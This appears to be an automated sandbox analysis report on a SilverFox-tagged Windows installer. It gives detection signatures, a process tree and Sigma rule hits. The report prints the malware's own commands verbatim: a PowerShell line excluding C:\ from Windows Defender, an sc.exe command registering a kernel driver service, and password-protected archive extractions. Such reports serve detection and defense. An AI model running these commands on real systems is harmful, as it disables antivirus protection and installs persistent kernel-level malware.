
Windows Analysis Report
#U5b89#U88c5#U52a9#U624b_2.0.4.exe

Overview

General Information

Sample name: #U5b89#U88c5#U52a9#U624b_2.0.4.exe
(renamed because original name is a hash value)
Original sample name: _2.0.4.exe
Analysis ID: 1579693
MD5: a32b45411fdacb8dc364e2ecc75f7c54
SHA1: a1d3298f2e0ec913d269c8e393ddf49f6cd8fdbc
SHA256: 1f20c061d4c41e3e775e80d6aabf5f23d88fbf25923f5821e81b824ef1d1ee46
Tags: exe, SilverFox, winos, user-kafan_shengui

Detection

Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • #U5b89#U88c5#U52a9#U624b_2.0.4.exe (PID: 7644 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" MD5: A32B45411FDACB8DC364E2ECC75F7C54)
    • #U5b89#U88c5#U52a9#U624b_2.0.4.tmp (PID: 7660 cmdline: "C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$20492,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" MD5: 9902FA6D39184B87AED7D94A037912D8)
      • powershell.exe (PID: 7676 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 7864 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U52a9#U624b_2.0.4.exe (PID: 7952 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" /VERYSILENT MD5: A32B45411FDACB8DC364E2ECC75F7C54)
        • #U5b89#U88c5#U52a9#U624b_2.0.4.tmp (PID: 7980 cmdline: "C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$402A0,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" /VERYSILENT MD5: 9902FA6D39184B87AED7D94A037912D8)
          • 7zr.exe (PID: 8060 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 8092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 8152 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 8160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8060 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • sc.exe (PID: 8008 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
              • conhost.exe (PID: 8168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8028 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8044 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7332 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7388 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7372 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7428 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4484 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1720 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4268 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4080 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5932 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3340 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7696 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7636 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7444 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1832 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2484 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4476 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7648 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2588 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8120 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8044 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7204 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7064 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7408 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7432 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7772 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7836 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7700 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7712 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7400 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3164 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1508 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1216 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1420 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3064 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5004 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7692 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7452 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3760 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2756 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7828 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3584 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1832 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7916 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7668 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8076 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8080 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8112 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8108 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8172 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7224 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8180 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7312 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7720 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7800 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7708 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5016 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7384 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4592 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3164 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3608 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1028 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$20492,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp, ParentProcessId: 7660, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7676, ProcessName: powershell.exe
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8028, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 8044, ProcessName: sc.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$20492,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp, ParentProcessId: 7660, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7676, ProcessName: powershell.exe
Source: Process started; Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community; Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8028, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 8044, ProcessName: sc.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$20492,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp, ParentProcessId: 7660, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7676, ProcessName: powershell.exe
No Suricata rule has matched


AV Detection

Source: C:\Program Files (x86)\Windows NT\hrsw.vbc; Virustotal: Detection: 10%
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exe; Virustotal: Detection: 9%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 91.0% probability
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb; source: 7zr.exe, 0000000C.00000003.1819516942.0000000003920000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1819340678.0000000003720000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp; Code function: 6_2_6C0BAEC0 FindFirstFileA,FindClose,FindClose,6_2_6C0BAEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 10_2_00AD6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_00AD6868
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 10_2_00AD7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_00AD7496
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.dr; String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
